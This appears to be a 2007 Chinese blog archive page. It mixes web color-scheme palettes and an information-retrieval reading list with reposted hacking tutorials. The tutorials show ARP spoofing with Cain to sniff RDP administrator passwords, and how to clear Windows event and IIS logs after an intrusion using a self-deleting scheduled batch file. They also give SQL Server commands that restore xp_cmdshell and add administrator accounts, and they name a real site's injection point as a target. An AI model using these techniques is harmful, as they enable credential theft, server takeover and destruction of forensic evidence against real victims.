23 2007

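Designers on Web Color Schemes: By Color (Green)

Posted by Yangybcy in Resources

  Green is also one of the most widely used colors on web pages.

  Because it carries associations with health, it is often used on health-related sites. Green is also common on corporate public relations sites and educational sites.

  • Pairing green with white gives a natural feel.
  • Pairing green with red gives a vivid, rich feel.
  • In addition, some color experts and medical experts have suggested that green can moderately relieve eye strain.

Color Point:

When people see green, their first reaction is to think of nature. Many people call green the color of nature, and green also stands for every precious life in nature. Nature gives us fresh oxygen, and green likewise brightens our mood. When you need to shake off a gloomy mood, or to recover a sense of calm and peace, returning to nature is the best way.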

 
 
 
Color 1: hex (R, G, B)    Color 2: hex (R, G, B)    Color 3: hex (R, G, B)
#009966 (0, 153, 102)     #ffffff (255, 255, 255)   #ffff00 (255, 255, 0)
#339933 (51, 153, 51)     #ffffff (255, 255, 255)   #9933cc (153, 51, 204)
#339933 (51, 153, 51)     #ffffff (255, 255, 255)   #000000 (0, 0, 0)
#339933 (51, 153, 51)     #99cc00 (153, 204, 0)     #ffffcc (255, 255, 204)
#ffffcc (255, 255, 204)   #cccc66 (204, 204, 102)   #336666 (51, 102, 102)
#99cc33 (153, 204, 51)    #ffff66 (255, 255, 102)   #336600 (51, 102, 0)
#339933 (51, 153, 51)     #cc9900 (204, 153, 0)     #666666 (102, 102, 102)
#339966 (51, 153, 102)    #cccccc (204, 204, 204)   #003366 (0, 51, 102)
#669933 (102, 153, 51)    #cccccc (204, 204, 204)   #000000 (0, 0, 0)
#339933 (51, 153, 51)     #cccccc (204, 204, 204)   #6699cc (102, 153, 204)
#006633 (0, 102, 51)      #cccc33 (204, 204, 51)    #cc9933 (204, 153, 51)
#339933 (51, 153, 51)     #666633 (102, 102, 51)    #cccc66 (204, 204, 102)
#339933 (51, 153, 51)     #ffcc33 (255, 204, 51)    #336699 (51, 102, 153)
#006633 (0, 102, 51)      #669933 (102, 153, 51)    #99cc99 (153, 204, 153)
#336666 (51, 102, 102)    #996633 (153, 102, 51)    #cccc33 (204, 204, 51)
#003300 (0, 51, 0)        #669933 (102, 153, 51)    #cccc99 (204, 204, 153)
#006633 (0, 102, 51)      #990033 (153, 0, 51)      #ff9900 (255, 153, 0)
#006633 (0, 102, 51)      #333300 (51, 51, 0)       #cccc99 (204, 204, 153)
#006633 (0, 102, 51)      #663300 (102, 51, 0)      #cccc66 (204, 204, 102)
#993333 (153, 51, 51)     #cc9966 (204, 153, 102)   #003300 (0, 51, 0)
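
The palettes above give each color both as decimal R, G, B values and as a hex code. The conversion between the two notations can be sketched as follows; the function names `rgb_to_hex` and `hex_to_rgb` are illustrative and do not come from the original article.

```python
def rgb_to_hex(r: int, g: int, b: int) -> str:
    """Format three 0-255 channel values as a lowercase '#rrggbb' code."""
    for channel in (r, g, b):
        if not 0 <= channel <= 255:
            raise ValueError(f"channel out of range: {channel}")
    # Each channel becomes two hexadecimal digits, zero-padded.
    return f"#{r:02x}{g:02x}{b:02x}"


def hex_to_rgb(code: str) -> tuple:
    """Parse a '#rrggbb' code back into an (r, g, b) tuple of ints."""
    digits = code.lstrip("#")
    if len(digits) != 6:
        raise ValueError(f"expected six hex digits, got: {code!r}")
    return tuple(int(digits[i:i + 2], 16) for i in (0, 2, 4))


if __name__ == "__main__":
    print(rgb_to_hex(0, 153, 102))
    print(hex_to_rgb("#9933cc"))
```

Every channel value in these palettes is a multiple of 51 (hex 33), which is why each hex pair is one of 00, 33, 66, 99, cc, or ff.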
23 2007

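Designers on Web Color Schemes: By Color (Blue)

Posted by Yangybcy in Resources

  Many sites pair blue with turquoise. The most representative blue things are seawater and the blue sky, and both give people a cool, refreshing feeling.

  • High-saturation blue creates a clean, brisk impression.
  • Low-saturation blue gives an urban, modern impression.

  Combinations of blue with green and white are also everywhere in everyday life; they appear in almost every part of the world.

  • Choosing a bright blue as the main color, with a white background and a light gray secondary color, makes a site look clean and tidy and gives a dignified, substantial impression.
  • Combining blue, turquoise, and white makes a page look very clean and clear.

Color Point:

Blue naturally reminds people of the sea and the sky, so it also evokes a sense of brightness, openness, and coolness. As the representative cool color, blue gives a strong sense of stability, and it can also express peace, elegance, cleanliness, reliability, and more.

Low-saturation blue is mainly used to create a stable, reliable atmosphere, while high-saturation blue can create a noble, solemn atmosphere.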
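
The text contrasts high- and low-saturation blues without saying how saturation is measured. As a rough sketch, assuming HSV saturation is an acceptable stand-in (the article does not name a color model, and `hsv_saturation` is a name chosen here for illustration), two blues from the palettes below can be compared like this:

```python
import colorsys


def hsv_saturation(hex_code: str) -> float:
    """Return the HSV saturation, between 0 and 1, of a '#rrggbb' color."""
    digits = hex_code.lstrip("#")
    # Scale each channel from 0-255 down to the 0-1 range colorsys expects.
    r, g, b = (int(digits[i:i + 2], 16) / 255 for i in (0, 2, 4))
    _, saturation, _ = colorsys.rgb_to_hsv(r, g, b)
    return saturation


if __name__ == "__main__":
    for code in ("#0099cc", "#99cccc"):
        print(code, round(hsv_saturation(code), 2))
```

Under this measure #0099cc is fully saturated, while the grayer #99cccc comes out at about 0.25. Other color models would give different numbers.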

     
Color 1: hex (R, G, B)    Color 2: hex (R, G, B)    Color 3: hex (R, G, B)
#ffffcc (255, 255, 204)   #ccffff (204, 255, 255)   #ffcccc (255, 204, 204)
#99cccc (153, 204, 204)   #ffffff (255, 255, 255)   #3399cc (51, 153, 204)
#ccffcc (204, 255, 204)   #99cccc (153, 204, 204)   #ffffcc (255, 255, 204)
#ccccff (204, 204, 255)   #ffffff (255, 255, 255)   #99ccff (153, 204, 255)
#ffcc99 (255, 204, 153)   #ffffcc (255, 255, 204)   #99ccff (153, 204, 255)
#336699 (51, 102, 153)    #ffffff (255, 255, 255)   #99cccc (153, 204, 204)
#99cccc (153, 204, 204)   #ffffff (255, 255, 255)   #ccff99 (204, 255, 153)
#ccccff (204, 204, 255)   #ffffcc (255, 255, 204)   #ccffff (204, 255, 255)
#99cccc (153, 204, 204)   #ffffff (255, 255, 255)   #336699 (51, 102, 153)
#99ccff (153, 204, 255)   #ccffff (204, 255, 255)   #6699cc (102, 153, 204)
#99cc33 (153, 204, 51)    #ffffff (255, 255, 255)   #3399cc (51, 153, 204)
#0099cc (0, 153, 204)     #ffffcc (255, 255, 204)   #666699 (102, 102, 153)
#cccccc (204, 204, 204)   #003366 (0, 51, 102)      #99ccff (153, 204, 255)
#0099cc (0, 153, 204)     #ffffff (255, 255, 255)   #666666 (102, 102, 102)
#cccccc (204, 204, 204)   #6699cc (102, 153, 204)   #666666 (102, 102, 102)
#336699 (51, 102, 153)    #cccc99 (204, 204, 153)   #003366 (0, 51, 102)
#3399cc (51, 153, 204)    #003366 (0, 51, 102)      #cccccc (204, 204, 204)
#6699cc (102, 153, 204)   #006699 (0, 102, 153)     #000000 (0, 0, 0)
#003366 (0, 51, 102)      #cccccc (204, 204, 204)   #006699 (0, 102, 153)
#999933 (153, 153, 51)    #336699 (51, 102, 153)    #333333 (51, 51, 51)
22 2007

推荐:3389的密码嗅探

Posted by Yangybcy in 资料
信息来源:邪恶八进制信息安全团队(www.eviloctal.com
文章作者:凋凌玫瑰[N.C.P.H]

Arp欺骗加嗅探,玩黑的朋友一定不会陌生,大家玩得最多的就是在同网段中嗅探ftp的密码,所以一般都喜欢渗透的主站开个ftp,但更多的时候是主站开3389的机率要比ftp大吧,如果能直接嗅探3389岂不是更爽。
Cain是大家都熟悉的一款软件,具有arp欺骗加嗅探和密码破解的功能,这里提供一个最新版的下载地址:
http://www.ncph.net/cain.exe,具体用法就不多讲了,相信大家都会用这个。本来cain就自带了嗅探终端(3389)密码的功能,但没有听用过,以前我也没有用过这个功能,但一次无意间使用嗅探时开了嗅探3389的功能,最后其它的什么都没有嗅探到,去嗅探到了一个RDP值,打开一分析,原来3389的密码就在其中。
很多朋友看了我的blog中的那个网站的渗透,都问我怎么嗅探到3389密码的,所以我打算把这个写出来共享给大家,转载请注明。
这里给大家做一个图文教程:首先安装cain.exe,默认安装就ok.
1.打开sniffer页面:


2.打开端口配置,设置嗅探3389端口:


3.点击嗅探和右击扫描mac:


4.打开arp页面,单击“+”号,打开欺骗设置:


5.左边选网关,右边选欺骗的ip:


6.点击欺骗按钮开始欺骗:


7.显示欺骗到一条数据


8.选择arp-rdp,在右边栏中右击数据


9.右击后打开的文档:


10:在文档中找到3389的管理员登录用户名和密码:


以上在外网和内网中测试通过,可以准确地抓到管理员密码,但必须是管理员登录成功后才能抓到,其实cain利用了arp欺骗截取数据传输封包,并且能破解3389的加密协议,软件不错。

22 2007

清理你入侵后的三个重要痕迹

Posted by Yangybcy in 资料

应用程序日志、
安全日志、
系统日志、

DNS日志默认位置:%systemroot%system32config,默认文件大小512KB,管理员都会改变这个默认大小。安全日志文件:%systemroot%system32configSecEvent.EVT
系统日志文件:%systemroot%system32configSysEvent.EVT
应用程序日志文件:%systemroot%system32configAppEvent.EVT
FTP日志默认位置:%systemroot%system32logfilesmsftpsvc1,默认每天一个
WWW日志默认位置:%systemroot%system32logfilesw3svc1,默认每天一个日志

以上日志在注册表里的键: 应用程序日志,安全日志,系统日志,DNS服务器日志,
它们这些LOG文件在注册表中的:
HKEY_LOCAL_MACHINEsystemCurrentControlSetServicesEventlog

钥匙(表示成功)和锁(表示当用户在做什么时被系统停止)。接连四个锁图标,表示四次失败审核,事件类型是帐户登录和登录、注销失败

怎样删除这些日志: 通过上面,得知日志文件通常有某项服务在后台保护,除了系统日志、安全日志、应用程序日志等等,它们的服务是Windos2000的关键进程,而且与注册表文件在一块,当Windows2000启动后,启动服务来保护这些文件,所以很难删除.

下面就是很难的安全日志和系统日志了,守护这些日志的服务是Event Log,试着停掉它! D:SERVERsystem32LogFilesW3SVC1>net stop eventlog 这项服务无法接受请求的"暂停" 或"停止" 操作。
怎么清除系统日志.
怎么利用工具清除IIS日志
怎么清除历史和cookie
怎么察看防火墙Blackice的日志
netstat -an 表示的什么意思

===================================
1.系统日志 通过手工很难清除. 这里我们介绍一个工具 clearlog.exe

使用方法:
Usage: clearlogs [\computername] <-app / -sec / -sys>

-app = 应用程序日志
-sec = 安全日志
-sys = 系统日志
a. 可以清除远程计算机的日志
** 先用ipc连接上去: net use \ipipc$ 密码/user:用户名
** 然后开始清除: 方法
clearlogs \ip -app 这个是清除远程计算机的应用程序日志
clearlogs \ip -sec 这个是清除远程计算机的安全日志
clearlogs \ip -sys 这个是清除远程计算机的系统日志

b.清除本机日志: 如果和远程计算机的不能空连接. 那么就需要把这个工具传到远程计算机上面
然后清除. 方法:

clearlogs -app 这个是清除远程计算机的应用程序日志
clearlogs -sec 这个是清除远程计算机的安全日志
clearlogs -sys 这个是清除远程计算机的系统日志

安全日志已经被清除.Success: The log has been cleared 成功.

为了更安全一点.同样你也可以建立一个批处理文件.让自动清除. 做好批处理文件.然后用at命令建立一个计划任务. 让自动运行. 之后你就可以离开你的肉鸡了.
例如建立一个 c.bat

rem ============================== 开始
@echo off
clearlogs -app
clearlogs -sec
clearlogs -sys
del clearlogs.exe
del c.bat
exit
rem ============================== 结束

在你的计算机上面测试的时候 可以不要 @echo off 可以显示出来. 你可以看到结果
第一行表示: 运行时不显示窗口
第二行表示: 清除应用程序日志
第三行表示: 清除安全日志
第四行表示: 清除系统日志
第五行表示: 删除 clearlogs.exe 这个工具
第六行表示: 删除 c.bat 这个批处理文件
第七行表示: 退出

用AT命令. 建立一个计划任务. 这个命令在原来的教程里面和杂志里面都有. 你可以去看看详细的使用方法

AT 时间 c:c.bat

之后你就可以安全离开了. 这样才更安全一点.

===================================

 

2.清除iis日志:
工具:cleaniis.exe
使用方法:
iisantidote <logfile dir> <ip or string to hide>
iisantidote <logfile dir><ip or string to hide> stop
stop opiton will stop iis before clearing the files and restart it after
<logfile dir> exemple : c:winntsystem32logfilesw3svc1 dont forget the

使用方法解释:
cleaniis.exe iis日志存放的路径 清除参数

什么意思呢??我来给大家举个例子吧:
cleaniis c:winntsystem32logfilesw3svc1 192.168.0.1
这个表示清除log中所有此IP(192.168.0.1)地址的访问记录. —–推荐使用这种方法

cleaniis c:winntsystem32logfilesw3svc1 /shop/admin/
这个表示清除这个目录里面的所以的日志

c:winntsystem32logfilesw3svc1 代表是iis日志的位置(windows nt/2000) 这个路径可以改变
c:windowssystem32logfilesw3svc1 代表是iis日志的位置(windows xp/2003) 这个路径可以改变

这个测试表示 在日志里面没有这个ip地址.
我们看一下日志的路径 再来看一下
我们的ip(192.168.0.1)已经没有了.
已经全部清空.

同样这个也可以建立批处理. 方法同上面的那个.

===================================
3.清除历史记录及运行的日志:
cleaner.exe
直接运行就可以了.

===================================
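4. Viewing the BlackICE log.
Here we can clearly see the firewall log.

This entry means someone sent an email attachment carrying a virus. The IP is 220.184.153.116.
tcp_probe_other means a TCP scan, or an attempt to establish a connection and communicate with you by some other means.
This entry means IIS was scanned through port 80.
The virus is Nimda.
Reading these entries takes a fair amount of knowledge of network protocols, as well as some English.
If your English is weak, you can install a dictionary program such as 金山词霸.
In general, some entries can be ignored.
These three kinds of entries usually need no attention.
The critical entries at the top are worth a look: they usually mean another computer really is scanning or trying to break into yours.

count is the number of occurrences, intruder is the other party's IP, and event is the method (protocol) used for the scan or intrusion attempt.
time is the time of the event.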

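===================================
5. What does netstat -an show?
This command lists all connections to and from the local machine.

Proto Local Address Foreign Address State
Protocol, local IP address and port, remote IP address and port, state

LISTENING: listening, waiting for the remote side to connect

ESTABLISHED: a connection is currently open

TCP: the protocol is TCP

UDP: the protocol is UDP

TCP 192.168.0.10:1115 61.186.97.54:80 ESTABLISHED
This line means the local IP (192.168.0.10) is connected over TCP from port 1115 to port 80 on the remote IP (61.186.97.54).
Port 80 is HTTP, which means you are visiting that web site.

In general, remote ports 80, 21, and 8000 are normal. If you see other remote ports, it is worth checking your computer.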
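
The column layout described above can be read mechanically. The following is a minimal sketch that splits one line of `netstat -an` output into its fields; the helper names are illustrative, it assumes IPv4-style `address:port` endpoints as in the sample line, and it treats the state column as optional because UDP rows normally have none.

```python
def split_endpoint(endpoint: str) -> tuple:
    """Split 'address:port' at the last colon, keeping both parts as strings."""
    host, _, port = endpoint.rpartition(":")
    return host, port


def parse_netstat_line(line: str) -> dict:
    """Parse one 'Proto Local Foreign [State]' row of netstat -an output."""
    fields = line.split()
    if len(fields) < 3:
        raise ValueError(f"not a connection row: {line!r}")
    proto, local, foreign = fields[:3]
    # UDP rows usually carry no state column, so allow it to be missing.
    state = fields[3] if len(fields) > 3 else None
    local_host, local_port = split_endpoint(local)
    remote_host, remote_port = split_endpoint(foreign)
    return {
        "proto": proto,
        "local_host": local_host,
        "local_port": local_port,
        "remote_host": remote_host,
        "remote_port": remote_port,
        "state": state,
    }


if __name__ == "__main__":
    row = parse_netstat_line("TCP 192.168.0.10:1115 61.186.97.54:80 ESTABLISHED")
    print(row["remote_host"], row["remote_port"], row["state"])
```

Ports are kept as strings because a wildcard endpoint such as `*:*` has no numeric port.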

03 2007

再次突破SA的方法

Posted by Yangybcy in 资料

xp_cmdshell新的恢复办法
删除
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc ‘xp_cmdshell’

恢复
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")

这样可以直接恢复,不用去管sp_addextendedproc是不是存在

—————————–

删除扩展存储过过程xp_cmdshell的语句:
exec sp_dropextendedproc ‘xp_cmdshell’

恢复cmdshell的sql语句
exec sp_addextendedproc xp_cmdshell ,@dllname =’xplog70.dll’

开启cmdshell的sql语句

exec sp_addextendedproc xp_cmdshell ,@dllname =’xplog70.dll’

判断存储扩展是否存在
select count(*) from master.dbo.sysobjects where xtype=’x’ and name=’xp_cmdshell’
返回结果为1就ok

恢复xp_cmdshell
exec master.dbo.addextendedproc ‘xp_cmdshell’,'xplog70.dll’;select count(*) from master.dbo.sysobjects where xtype=’x’ and name=’xp_cmdshell’
返回结果为1就ok

否则上传xplog7.0.dll
exec master.dbo.addextendedproc ‘xp_cmdshell’,'c:\winnt\system32\xplog70.dll’

堵上cmdshell的sql语句
sp_dropextendedproc "xp_cmdshell

 

 

 

{技术}突破SA的各种困难

今天跟无聊兄弟,搞了很多开1433端口的服务器。但是要到密码了。总是有一些不能直接执行CMD

但是看了下面的文章,嘎嘎………………全部突破!

———————————————————————————————————————————–

方法1:查询分离器连接后
第一步执行:use master
第二步执行:sp_dropextendedproc ‘xp_cmdshell’
然后按F5键命令执行完毕

三.常见情况恢复执行xp_cmdshell.

1 未能找到存储过程’master..xpcmdshell’.
恢复方法:查询分离器连接后,
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname =’xplog70.dll’declare @o int
第二步执行:sp_addextendedproc ‘xp_cmdshell’, ‘xpsql70.dll’
然后按F5键命令执行完毕

2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
恢复方法:查询分离器连接后,
第一步执行:sp_dropextendedproc "xp_cmdshell"
第二步执行:sp_addextendedproc ‘xp_cmdshell’, ‘xpsql70.dll’
然后按F5键命令执行完毕

3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
恢复方法:查询分离器连接后,
第一步执行:exec sp_dropextendedproc ‘xp_cmdshell’
第二步执行:exec sp_addextendedproc ‘xp_cmdshell’,'xpweb70.dll’
然后按F5键命令执行完毕

四.终极方法.
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
查询分离器连接后,
2000servser系统:
declare @shell int exec sp_oacreate ‘wscript.shell’,@shell output exec sp_oamethod @shell,’run’,null,’c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add’

declare @shell int exec sp_oacreate ‘wscript.shell’,@shell output exec sp_oamethod @shell,’run’,null,’c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add’

xp或2003server系统:

declare @shell int exec sp_oacreate ‘wscript.shell’,@shell output exec sp_oamethod @shell,’run’,null,’c:\windows\system32\cmd.exe /c net user 新用户 密码 /add’

declare @shell int exec sp_oacreate ‘wscript.shell’,@shell output exec sp_oamethod @shell,’run’,null,’c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add’

 

 

SA权限添加管理员帐号的SQL命令
注入点:http://www.enzymotec.com/Page.asp cc=0102041102           IP:192.117.122.145     以色列 inurl:asp
具体脚本命令:
1.判断是否有注入;and 1=1 ;and 1=2  
;and user_name()=’dbo’ 判断当前系统的连接用户是不是sa
2.添加系统的管理员
;exec master.dbo.xp_cmdshell ‘net user jiaozhu jiaozhu /add’;–
;exec master.dbo.xp_cmdshell ‘net localgroup administrators jiaozhu /add’;–
 
 
declare @shell int exec sp_oacreate ‘wscript.shell’,@shell output exec sp_oamethod @shell,’run’,null,’c:\windows\system32\cmd.exe /c
这段命令是通过SQL执行系统命令的
例如:
declare @shell int exec sp_oacreate ‘wscript.shell’,@shell output exec sp_oamethod @shell,’run’,null,’c:\windows\system32\cmd.exe /c net user jiss 111 /add’
这段命令是通过SQL执行系统命令的
 
 
 

需要有管理员权限,在命令下先建立一个c:\test.qry文件,内容如下:
exec master.dbo.sp_addlogin test,123
EXEC sp_addsrvrolemember ‘test, ’sysadmin’
然后在DOS下执行:cmd.exe /c isql -E /U alma /P /i c:\test.qry

02 2007

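Search Engines: Related Papers

Posted by Yangybcy in Resources

There are generally two good channels for finding papers like these:

The first is to look at the well-known international conferences in the field. For the area you mention, conferences such as ACM SIGIR/SIGKDD, WWW, and ECIR all cover it. Find their conference web sites from recent years, get the lists of recent papers, and then use Google to find the full text.

The second is to search for papers in relevant journals on the ACM library, IEEE, and Springer web sites. These sites generally do not offer free downloads, so you may need to ask friends at universities to download papers through their institutions' free access, or use Google for English searches and Sogou for Chinese searches to find them.

We may release some working papers produced jointly by sogoulab and universities early next month; these can also serve as references for you.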

<Post #4> Author: sogoulab (2006-12-21 20:33)
The following is Professor Yan's resource list:

zz from [net.pku.edu.cn]

信息检索领域相关资料 (A Guide to Information Retrieval)
Organized by Hongfei Yan
Last updated on April 19, 2006

———————
Contents
Books
+ Finding Out About: Search Engine Technology from a cognitive
Perspective (Belew, R.K., 2000)
[www-cse.ucsd.edu]
+ Foundations of Statistical Natural Language Processing (C. Manning and H. Schutze, 1999)
+ Information Retrieval, 2nd edition (C.J. van Rijsbergen, 1979)
(full text)
[www.dcs.gla.ac.uk]
+ Information Retrieval: A Survey (Ed Greengrass, 2000)
[www.csee.umbc.edu]
+ Information Retrieval: Data Structures & Algorithms
(Frakes, W. and Baeza-Yates, R., 1992)
[www.dcc.uchile.cl]
+ Information Retrieval Interaction (Ingwersen, P., Taylor Graham, 1992)
[www.db.dk]
+ Managing Gigabytes:compressing and indexing documents and images,
2nd edition, (Ian H. Witten, Alistair Moffat,and Timothy Bell,1999)
+ Mining the Web: Discovering Knowledge from Hypertext Data
(Soumen Chakrabarti, 2003)
+ Modeling the Internet and the Web:
probabilistic Methods and Algorithms
(Pierre Baldi, Paolo Frasconi and Padhraic Smyth, 2003)
+ Modern Information Retrieval
(Ricardo Baeza-Yates and Berthier Ribeiro-Neto, 2000)
+ Readings in Information Retrieval.
(Sparck-Jones, K. and Willett, P., 1997)
+ Search Engine: Principle,Technology and Systems
搜索引擎-原理、技术与系统
(Xiaoming Li,et al., 2005 ), (full text)
[sewm.pku.edu.cn]
+ The Geometry of Information Retrieval
(C.J. van Rijsbergen, 2004)
[ir.dcs.gla.ac.uk]
+ The Turn: Integration of Information Seeking and Retrieval in Context
(Ingwersen, P., and Jarvelin, K., 2005)
+ TREC: Experiment and Evaluation in Information Retrieval
(Voorhees, E.M., and Harman, D.K., 2005)
[mitpress.mit.edu]

Conferences and Workshops
+ CIKM: Conference on Information and Knowledge Management
[www.csee.umbc.edu]
+ SIGIR: Special Interest Group on Information Retrieval
[www.sigir.org]
+ World Wide Web
[www.iw3c2.org]
+ SEWM: Symposium of Search Engine and WebMining
全国搜索引擎和网上信息挖掘学术研讨会
[net.pku.edu.cn]

Courses
+ CMU Information Retrieval
[nyc.lti.cs.cmu.edu] (Spring 2006)
Instructors: Jamie Callan and Yiming Yang
+ Cornell University The Structure of Information Networks (Spring 2006)
[www.cs.cornell.edu]
Instructor: Jon Kleinberg
+ Peking University Web Based Information Architectures (Fall 2005)
[net.pku.edu.cn]
Instructor: Xiaoming Li, Jimin Wang and Bo Peng
+ Stanford Univ. Text Information Retrieval and Web Mining (Autumn 2005)
[www.stanford.edu]
Instructor: Christopher Manning and Prabhakar Raghavan
+ UIUC Introduction to Text Information Systems (Spring 2006)
[sifaka.cs.uiuc.edu]
Instructor: ChengXiang Zhai
+ UMass Univ. Information retrieval course (Spring 2005)
[ciir.cs.umass.edu]
Instructors: James Allan
+ Washington Univ. Search Engines course
[courses.washington.edu]

Evaluation Resources
+ CLEF: Cross-Language Evaluation Forum
[clef.iei.pi.cnr.it]
+ CWIRF: Chinese Web Information Retrieval Forum
[www.cwirf.org]
+ DUC: Document Understanding Conferences
[duc.nist.gov]
+ INEX: INitiative for the Evaluation of XML Retrieval
[inex.is.informatik.uni-duisburg.de]
+ NTCIR: NII-NACSIS Test Collection for IR Systems
[research.nii.ac.jp]
+ TREC: Text REtrieval Conference
[trec.nist.gov]

Journals
+ Briefings in Bioinformatics (full text)
[bib.oxfordjournals.org]
+ Computational Linguistics, The MIT Press
[mitpress.mit.edu]
+ Data & Knowledge Engineering (DKE), Elsevier
[www.elsevier.com]
+ D-Lib Magazine
[www.dlib.org]
+ Information Processing Letters, Elsevier
[www.elsevier.com]
+ Information Processing and Management (IP&M), Elsevier
[www.elsevier.com]
+ Information Retrieval, Springer
[www.springer.com]
+ Information Research
[informationr.net]
+ International Journal on Digital Libraries, Springer
[link.springer.de]
+ International Journal of Cooperative Information Systems (IJCIS),
World Scientific
[ejournals.wspc.com.sg]
+ International Journal on Document Analysis and Recognition, Springer
[link.springer.de]
+ International Journal of Intelligent Systems, Wiley
[www3.interscience.wiley.com]
+ International Journal of Uncertainty, Fuzziness and Knowledge-Based Systems (IJUFKS), World Scientific
[ejournals.wspc.com.sg]
+ Journal of the American Society for Information Science and Technology (JASIST), Wiley
[www3.interscience.wiley.com]
+ Journal of Documentation (JDoc). Emerald
[www.emeraldinsight.com]
+ Journal of Intelligent Information Systems (JIIS), Springer
[www.wkap.nl]
+ Knowledge and Information Systems (KAIS), Springer
[link.springer.de]
+ Natural Language Engineering, Cambridge University Press
[www.cambridge.org]
+ Transactions On Information Systems (TOIS), ACM
[www.acm.org]
+ Transactions on Knowledge and Data Engineering (TKDE), IEEE
[www.computer.org]

List Archives
+ SIG-IRList, [www.sigir.org]

Organizations and Special Interest Groups
+ Cambridge NLIP, [www.cl.cam.ac.uk]
+ CMU LTI, [www.lti.cs.cmu.edu]
+ DEC laboratories in Palo Alto, Calif.
+ Glasgow Information Retrieval Group, [www.dcs.gla.ac.uk]
+ Google Labs, [labs.google.com]
+ LTI, [www.lti.cs.cmu.edu]
+ Massachusetts CIIR, [ciir.cs.umass.edu]
+ MSR Asia, Web Search & Data Mining Group
[research.microsoft.com]
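+ Stanford InfoLab, [infolab.stanford.edu]
+ UIUC Information Retrieval Group, [sifaka.cs.uiuc.edu]
+ PKU Tianwang Group (北大天网组), [sewm.pku.edu.cn]
+ Institute of Computational Linguistics, Peking University (北京大学计算语言学研究所), [icl.pku.edu.cn]
+ Fudan University Information Retrieval and Natural Language Processing Group (复旦大学信息检索和自然语言处理组),
[www.cs.fudan.edu.cn]
+ HIT Information Retrieval Lab (哈工大信息检索组), [ir.hit.edu.cn]
#+ State Key Laboratory of Intelligent Technology and Systems, Tsinghua University (清华大学智能技术与系统国家重点实验室), (URL could not be reached)
# [www.csai.tsinghua.edu.cn]
+ CAS Large-Scale Content Computing Group (中科院大规模内容计算组), [159.226.40.18]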

Researchers
+ ChengXiang Zhai, developing Lemur
[www-faculty.cs.uiuc.edu]
+ Gerard Salton
[www.cs.cornell.edu]
+ Karen Sparck Jones, developing IDF
[www.cl.cam.ac.uk]
+ Keith van Rijsbergen
[www.dcs.gla.ac.uk]
+ Jamie Callan,
[www.cs.cmu.edu]
+ Jon Kleinberg, developing HITS
[www.cs.cornell.edu]
+ Li Xiaoming, developing Tianwang & Infomall
+ Nick Craswell, developing Terabyte Track
[research.microsoft.com]
+ Susan Dumais, developing LSI
[research.microsoft.com]
+ Yiming Yang, developing text categorization
[www.cs.cmu.edu]
+ Stephen Robertson,
[research.microsoft.com]
+ Tefko Saracevic
[www.scils.rutgers.edu]
+ W. Bruce Croft
[ciir.cs.umass.edu]

Research-related Resources
+ [www-faculty.cs.uiuc.edu]

Software
+ Apache Lucene: a full-featured text search engine library
[lucene.apache.org]
+ Gate: a general architecture for text engineering
[gate.ac.uk]
+ Lemur: A full-text search engine
[www.lemurproject.org]
+ MG: A full-text search engine
[www.math.utah.edu]
+ Porter Stemmer: English stemming algorithm
[www.tartarus.org]
+ Nutch: an open source web search engine
[sourceforge.net]
+ TSE: A Tiny Search Engine
[sewm.pku.edu.cn]

———————
References:
[1] Information Retrieval Resources, [www.sigir.org]
[2] [ir.dcs.gla.ac.uk]
[3] [www.cs.cmu.edu]
[4] Diekemar, Information Retrieval Links, Jan. 28, 1999.
[web.syr.edu]
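[5] Chen Hongbiao, Studying Information Retrieval Online (网上研习信息检索), Nov. 1999.
[159.226.40.18]网上研习信息检索.doc
[6] Data Mining Research Institute (数据挖掘研究院), [www.dmresearch.net]
[7] Speech and Natural Language Online (语音自然语言在线), [www.snlpinfo.com]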
[8] PKU SEWM Group, [sewm.pku.edu.cn]
[9] [www.cs.cmu.edu]
[10] [icl.pku.edu.cn]
[11] [www.cs.fudan.edu.cn]
[12] Robert Krovetz, A Guide to the Literature of Information Retrieval,
[159.226.40.18]
[13] ACM Digital Library,
[portal.acm.org]
[acm.lib.tsinghua.edu.cn]
[14] [www.sigir.org]
[15] SIGIR,
[portal.acm.org]
[16] WWW, International World Wide Web Conference
[portal.acm.org]
[17] China Digital Journal Community, [wanfang.calis.edu.cn]

———————

More details are listed as follows
====================
CIIR
(The Center for Intelligent Information Retrieval,
University of Massachusetts, USA)
[ciir.cs.umass.edu]

The Center for Intelligent Information Retrieval, a National Science
Foundation-created S/IUCRC Center, is one of the leading information retrieval
research labs in the world. The CIIR develops tools that provide effective
and efficient access to large, heterogeneous, distributed, text and
multimedia databases.

CIIR accomplishments include significant research advances in the areas of
distributed information retrieval, information filtering, topic detection,
multimedia indexing and retrieval, document image processing, terabyte
collections, data mining, summarization, resource discovery, interfaces
and visualization, and cross-lingual information retrieval.

The Center for Intelligent Information Retrieval continues to support the
emerging information infrastructure, both through research and technology
transfer. The goal of the CIIR is to develop tools that provide effective
and efficient access to large, heterogeneous, distributed, text and
multimedia databases.

====================
Glasgow Information Retrieval Group
[www.dcs.gla.ac.uk]
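The information retrieval research group at the University of Glasgow, UK, led by
Keith van Rijsbergen. The group gives equal weight to theory and practice and aims
to build efficient, novel, and successful multimedia information retrieval systems
that serve end users.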

The Information Retrieval Group led by Professor Keith van Rijsbergen has a
vigorous programme of research, based on both theory and experiment, aimed at
giving end-users novel, effective, and efficient access to the world of
multi-media information. The group, part of the Department of Computing Science,
University of Glasgow, has a strong research history in a wide area of
information retrieval research from theoretical modelling of the retrieval
process to advanced system building and to the user-oriented evaluation of
information retrieval systems. The group’s interests also include many areas
of Web information retrieval such as link analysis, summarisation and the
development of novel interaction techniques (e.g., ostension, implicit feedback
and graphical visualisation). Our research preserves a strong emphasis on
the evaluation of interactive IR systems, and the group maintains strong links
with researchers in Human-Computer Interaction and Psychology.

——
Keith van Rijsbergen, [www.dcs.gla.ac.uk]
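University of Glasgow, UK. A leading figure of the logical-inference school of
probabilistic IR. He published the well-known classic IR textbook
INFORMATION RETRIEVAL, which focuses on probabilistic approaches to information retrieval.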

=====================
Cambridge NLIP Group
(Natural Language and Information Processing Group)
